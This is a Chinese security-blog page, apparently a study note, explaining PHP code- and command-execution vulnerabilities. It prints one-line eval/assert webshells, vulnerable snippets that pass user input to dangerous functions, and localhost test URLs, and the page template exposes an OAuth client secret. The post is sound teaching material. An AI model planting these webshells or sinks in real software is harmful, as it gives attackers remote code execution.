<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>代码/命令执行漏洞 | Twe1ve&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>
  <meta name="description" content="代码执行代码执行条件：  存在危险函数且传入的参数用户可控 传入的函数&amp;参数用户可控  危险函数：  eval和assert preg_replace 回调函数 动态函数  eval 和 assert函数：常见的一句话木马实例： &lt;?php eval(@$_POST[&amp;apos;a&amp;apos;]); ?&gt;  &lt;?php assert(@$_POST[&amp;apos;a&amp;apo">
<meta property="og:type" content="article">
<meta property="og:title" content="代码&#x2F;命令执行漏洞">
<meta property="og:url" content="https://github.com/2020/05/24/%E4%BB%A3%E7%A0%81-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Twe1ve&#39;s Blog">
<meta property="og:description" content="代码执行代码执行条件：  存在危险函数且传入的参数用户可控 传入的函数&amp;参数用户可控  危险函数：  eval和assert preg_replace 回调函数 动态函数  eval 和 assert函数：常见的一句话木马实例： &lt;?php eval(@$_POST[&amp;apos;a&amp;apos;]); ?&gt;  &lt;?php assert(@$_POST[&amp;apos;a&amp;apo">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://github.com/2020/05/24/%E4%BB%A3%E7%A0%81-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1.png">
<meta property="og:image" content="https://github.com/2020/05/24/%E4%BB%A3%E7%A0%81-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/2.png">
<meta property="article:published_time" content="2020-05-24T07:39:07.000Z">
<meta property="article:modified_time" content="2020-05-24T07:47:25.892Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2020/05/24/%E4%BB%A3%E7%A0%81-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1.png">
  
    <link rel="icon" href="/images/icon.png">
  
  
<link rel="stylesheet" href="/css/index.css">



  <!-- 百度站長統計-->
  
  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?f4e4f3d9d2532faa71e451f2ab41cbb6";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>
  
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="Twe1ve's Blog" type="application/atom+xml">
</head>

<div class="main height-100 flex flex-v">
  <div class="phone-header">
    <a to="/home" class="mobile-logo" > <img src="/images/logo.svg" /> </a>
    <a class="menu iconfont icon-menu" onclick="toggleMenu()"></a>
  </div>
  <div class="main-top flex flex1">
    <nuxt-link  to="/home" class="mobile-nav-btn iconfont icon-fenlei"></nuxt-link>
    <!--主页上左部分-->
    <div class="height-100 main-left  flex flex-v">
      <div class="main-left-top flex1">
        <a class="logo">
          <img src="/images/logo.svg" />
          <div class="sub-title">废物Twe1ve的垃圾展示台</div>
        </a>
        <nav class="nav">

  
    
      <a title="首页"  alt="首页"  v-for="(menu,index) in menus" href="/">
        <div class="icon"><i class="iconfont icon-home"></i></div>
        <div class="name">
          <div class="cnname">首页</div>
          <div class="enname">Home Page</div>
        </div>
      </a>

    
      <a title="归档"  alt="归档"  v-for="(menu,index) in menus" href="/archives">
        <div class="icon"><i class="iconfont icon-archives"></i></div>
        <div class="name">
          <div class="cnname">归档</div>
          <div class="enname">Archive Page</div>
        </div>
      </a>

    
      <a title="关于我"  alt="关于我"  v-for="(menu,index) in menus" href="./../about">
        <div class="icon"><i class="iconfont icon-about"></i></div>
        <div class="name">
          <div class="cnname">关于我</div>
          <div class="enname">About Me</div>
        </div>
      </a>

    
  

  <!--<a href="/link/">
    <div class="icon"><i class="iconfont icon-link"></i></div>
    <div class="name">
      <div class="cnname">友情链接</div>
      <div class="enname">Friends Web Link</div>
    </div>
  </a>-->
</nav>

      </div>

      <view class="website-msg">
        <div class="beian"><a target="_blank" href="http://www.miitbeian.gov.cn/"></a></div>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <div class="beian"><span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span></div>
        <!--
        <div class="theme-drsc">PowerBy:<a href="https://hexo.io" target="_blank">Hexo</a> ThemeBy:<a href="" target="_blank">Soul</a></div>
        -->
        <div class="copyright">Copyright &#169 <a href="mailto:yorojogame@gmail.com">2020 Twe1ve&#39;s Blog</a> </div>
      </view>

      <div class="social flex flex-align-center ">
        
          
            
          
        
      </div>
    </div>
    <!--主页上右部分-->
    <div class="main-right flex1 flex flex-v">
    <div class="article-content flex1">
        <div class="article-content-container">
            <div class="article-title row">
                <div class="title">代码/命令执行漏洞</div>
                <div class=" other">
                    <!--<i class="iconfont icon-iconfontordinaryliulan"></i> 56--> <i
                        class="iconfont icon-shijian"></i>· May 24, 2020 ·</div>
            </div>
            <div class="article-message markdown-body">
                <article class="text" v-highlight>
                    <h1 id="代码执行"><a href="#代码执行" class="headerlink" title="代码执行"></a>代码执行</h1><p><strong>代码执行条件</strong>：</p>
<ol>
<li>存在危险函数且传入的参数用户可控</li>
<li>传入的函数&amp;参数用户可控</li>
</ol>
<p><strong>危险函数</strong>：</p>
<ul>
<li>eval和assert</li>
<li>preg_replace</li>
<li>回调函数</li>
<li>动态函数</li>
</ul>
<p><strong>eval 和 assert函数：</strong><br>常见的一句话木马实例：</p>
<pre><code>&lt;?php eval(@$_POST[&apos;a&apos;]); ?&gt;

&lt;?php assert(@$_POST[&apos;a&apos;]); ?&gt;</code></pre><p>eval()函数的参数必须以分号结尾，assert()则不用</p>
<p><strong>pre_replace</strong>:</p>
<p>语法：</p>
<pre><code>preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &amp;$count ]] ) : mixed</code></pre><p>若正则表达式$pattern中有/e修饰符且成功匹配，则将$replacement的值当作php代码执行</p>
<p>实例：</p>
<pre><code>&lt;?php
    preg_replace(&apos;/\[(.*)\]/e&apos;, &apos;\\1&apos;, $_GET[&apos;str&apos;]);
?&gt;</code></pre><p>从$str中搜索[]中间的内容作为第一组结果，\1代表这里使用第一组结果填充</p>
<p>根据<a href="https://www.php.net/manual/zh/function.preg-replace.php" target="_blank" rel="noopener">官方文档</a>： </p>
<pre><code>PHP 5.5.0 起， 传入 &quot;\e&quot; 修饰符的时候，会产生一个 E_DEPRECATED 错误； PHP 7.0.0 起，会产生 E_WARNING 错误，同时 &quot;\e&quot; 也无法起效。</code></pre><p>也意味着preg_replace在php5.5+可用，但是会报警，php7中完全废除不可用</p>
<p><img src="1.png" alt=""></p>
<p>php5.5.38测试结果：</p>
<p><img src="2.png" alt=""></p>
<h2 id="回调函数："><a href="#回调函数：" class="headerlink" title="回调函数："></a>回调函数：</h2><p><strong>常见回调函数：</strong></p>
<ul>
<li>call_user_func()</li>
<li>array_map()</li>
<li>call_user_func_array()</li>
<li>create_func()</li>
<li>uksort()    </li>
<li>…</li>
</ul>
<p>以call_user_func_array()为例：</p>
<p>语法：</p>
<pre><code>mixed call_user_func_array ( callable $callback , array $param_arr )</code></pre><p>把第一个参数作为回调函数（callback）调用，把参数数组作（param_arr）为回调函数的的参数传入。</p>
<pre><code>&lt;?php
    call_user_func_array($_GET[&apos;a&apos;],$_GET[&apos;b&apos;]);
?&gt;</code></pre><p><a href="http://127.0.0.1/test.php?a=assert&amp;b[]=phpinfo()" target="_blank" rel="noopener">http://127.0.0.1/test.php?a=assert&amp;b[]=phpinfo()</a></p>
<p><strong>动态函数执行</strong>：</p>
<pre><code>&lt;?php
$_GET[&apos;a&apos;]($_GET[&apos;b&apos;]);
?&gt;</code></pre><p><a href="http://127.0.0.1/test.php?a=assert&amp;b=phpinfo()" target="_blank" rel="noopener">http://127.0.0.1/test.php?a=assert&amp;b=phpinfo()</a></p>
<h1 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h1><p>顾名思义，命令执行漏洞执行的是系统的命令，因此需要可以执行系统命令的函数存在，且传入参数用户可控</p>
<p><strong>7个命令执行函数：</strong></p>
<ul>
<li>system()</li>
<li>exec()</li>
<li>shell_exec()</li>
<li>passthru()</li>
<li>pcntl_exec()</li>
<li>popen()</li>
<li>proc_open()</li>
</ul>
<p>` 也可以执行命令，但是调用的是shell_exec()函数</p>
<pre><code>&lt;?php system(&quot;whoami&quot;);  ?&gt;</code></pre><p>system() 输出并返回最后一行shell结果。</p>
<pre><code>&lt;?php echo exec(&quot;whoami&quot;); ?&gt;</code></pre><p>exec() 不输出结果，返回最后一行shell结果，所有结果可以保存到一个返回的数组里面（需要借助echo）。</p>
<pre><code>&lt;?php echo shell_exec(&quot;whoami&quot;); ?&gt;</code></pre><p>通过 shell 环境执行命令，并且将完整的输出以字符串的方式返回（同样需要借助echo）</p>
<pre><code>&lt;?php passthru(&quot;whoami&quot;); ?&gt;</code></pre><p>passthru() 只调用命令，把命令的运行结果原样地直接输出到标准输出设备上。</p>
<pre><code>&lt;?php pcntl_exec ( &quot;/bin/bash&quot; , array(&quot;whoami&quot;)); ?&gt;</code></pre><p>pcntl_exec需要额外安装（）</p>
<pre><code>&lt;?php $handle = popen(&quot;/bin/ls&quot;, &quot;r&quot;); ?&gt;</code></pre><p>r代表读，w代表写</p>
<p>popen()、proc_open() 不会直接返回执行结果，而是返回一个文件指针</p>
<p>反单引号命令执行</p>
<pre><code>&lt;?php echo  `whoami` ; ?&gt;</code></pre>
                </article>
            </div>
            <div id="gitalk-container"></div>
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<style>
    .hljs {
        display: block !important;
        overflow-x: auto !important;
        background: #2b2b2b !important;
        color: #f8f8f2 !important;
        padding: .5em !important;
    }
</style>
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
<script>
    var gitalk = new Gitalk({
        clientID: '85810192d72d7f763a9a',
        clientSecret: 'e9867192041e53ad9f4581db6e50bbe7373a090d',
        repo: 'myblog',
        owner: 'callmesoul',
        admin: ['callmesoul'],
        id: '', // Ensure uniqueness and length less than 50
        distractionFreeMode: false // Facebook-like distraction free mode
    })
    gitalk.render('gitalk-container')
</script>
        </div>
    </div>
</div>

<link href="https://cdn.bootcss.com/highlight.js/9.15.7/styles/a11y-dark.min.css" rel="stylesheet">
<script src="https://cdn.bootcss.com/highlight.js/9.15.9/highlight.min.js"></script>
<script>
    document.addEventListener('DOMContentLoaded', (event) => {
        document.querySelectorAll('pre code').forEach((block) => {
            hljs.highlightBlock(block);
        });
    });
</script>
  </div>
  <!--
  <div class="main-bottom">
    <div class="music flex flex-pack-justify flex-align-center">
      <div class="control">
        <a onclick="preSong()"><span class="iconfont icon-shangyishou"></span></a>
        <a onclick="playControl()"><span class="iconfont play-icon icon-kaishi1"></span></a>
        <a onclick="nextSong()"><span class="iconfont icon-xiayishou-copy"></span></a>
      </div>
      <div class="msg">
        <span class="time"></span>
        <div class="line" ref="progress-line-warp">
          <div class="song-msg">周杰伦 - 说好不哭</div>
          <!--<div class="current-line" ref="progress-line">
            <a tag="a" class="target" v-on:mousedown.prevent="mousedown"></a>
          </div>-->
        </div>
        <span class="all-time"></span>
      </div>
      <div class="right-control">
        <a class="order-btn flex flex-align-center" onclick="toogleShowMusicList()">
          <span class="iconfont icon-ttpodicon"></span>
          <span class="number flex1">3</span>
        </a>
      </div>
      <audio id="audio" class="mian-audio" src="https://callmesoul-blog.oss-cn-shenzhen.aliyuncs.com/music/%E5%91%A8%E6%9D%B0%E4%BC%A6%20-%20%E8%AF%B4%E5%A5%BD%E4%B8%8D%E5%93%AD.mp3">
        Your browser does not support the audio element.
      </audio>
    </div>
  </div>
  <div class="music-list">
    <div id="musiclist">
      
        <a class="music-item flex flex-align-center" data-name="周杰伦 - 说好不哭" data-url="https://callmesoul-blog.oss-cn-shenzhen.aliyuncs.com/music/%E5%91%A8%E6%9D%B0%E4%BC%A6%20-%20%E8%AF%B4%E5%A5%BD%E4%B8%8D%E5%93%AD.mp3" onclick="changePlayIndex(0)" >
          <span class="iconfont" class="icon-kaishi"></span>
          <span class="title flex1">说好不哭 - 周杰伦</span>
        </a>
      
        <a class="music-item flex flex-align-center" data-name="周杰伦 - 爱在西元前" data-url="https://callmesoul-blog.oss-cn-shenzhen.aliyuncs.com/music/%E5%91%A8%E6%9D%B0%E4%BC%A6%20-%20%E7%88%B1%E5%9C%A8%E8%A5%BF%E5%85%83%E5%89%8D%20%5Bmqms2%5D.mp3" onclick="changePlayIndex(1)" >
          <span class="iconfont" class="icon-kaishi"></span>
          <span class="title flex1">爱在西元前 - 周杰伦</span>
        </a>
      
        <a class="music-item flex flex-align-center" data-name="周杰伦 - 龙拳" data-url="https://callmesoul-blog.oss-cn-shenzhen.aliyuncs.com/music/%E5%91%A8%E6%9D%B0%E4%BC%A6%20-%20%E9%BE%99%E6%8B%B3%20%5Bmqms2%5D.mp3" onclick="changePlayIndex(2)" >
          <span class="iconfont" class="icon-kaishi"></span>
          <span class="title flex1">龙拳 - 周杰伦</span>
        </a>
      
    </div>
  </div>
</div>

<script>
  var playIndex = localStorage.getItem('playIndex') ? parseInt(localStorage.getItem('playIndex')) : 0
  let musics = $('.music-item')
  musics.eq(playIndex).addClass('active')
  var audio = document.getElementById("audio");

  $('.song-msg').html(musics[playIndex].dataset.name)
  audio.src = musics[playIndex].dataset.url


  var playbtn = document.getElementsByClassName("play-icon")[0];
  var playing = false;
  audio.loop = false;
  audio.addEventListener('ended', function () {
    playbtn.classList.remove("icon-kaishi")
    playbtn.classList.add("icon-kaishi1")
    playing = false
  }, false);
  audio.addEventListener('play', function () {
    playbtn.classList.remove("icon-kaishi1")
    playbtn.classList.add("icon-kaishi")
    playing= true
  }, false);
  audio.addEventListener('pause', function () {
    playbtn.classList.remove("icon-kaishi")
    playbtn.classList.add("icon-kaishi1")
    playing = false
  }, false);
  function toogleShowMusicList() {
    var musiclist = document.getElementsByClassName("music-list")[0];
    if(musiclist.className.indexOf("active") === -1){
      musiclist.classList.add("active")
    }else{
      musiclist.classList.remove("active");
    }
  }

  function playControl() {
    if(playing){
      audio.pause()
    }else{
      audio.play()
    }
  }

  function changePlayIndex(index) {
    if(playIndex !== index){
      localStorage.setItem('playIndex',index)
      playIndex = index
      musics.removeClass('active')
      musics.eq(playIndex).addClass('active')
      $('.song-msg').html(musics[playIndex].dataset.name)
      audio.src = musics[playIndex].dataset.url
      audio.play()
    }else{
      playControl()
    }
  }

  function preSong() {
    var index
    if(playIndex === 0){
      index = musics.length - 1
    }else{
      index = playIndex - 1
    }
    changePlayIndex(index)
  }

  function nextSong() {
    var index
    if(playIndex === musics.length - 1){
      index = 0
    }else{
      index = playIndex + 1
    }
    changePlayIndex(index)
  }
-->
  function toggleMenu() {
    var mainLeft = $('.main-left')
    if(mainLeft.hasClass('active')){
      mainLeft.removeClass('active')
      $('.menu').removeClass('icon-close')
      $('.menu').addClass('icon-menu')
    }else{
      mainLeft.addClass('active')
      $('.menu').removeClass('icon-menu')
      $('.menu').addClass('icon-close')
    }
  }
</script>
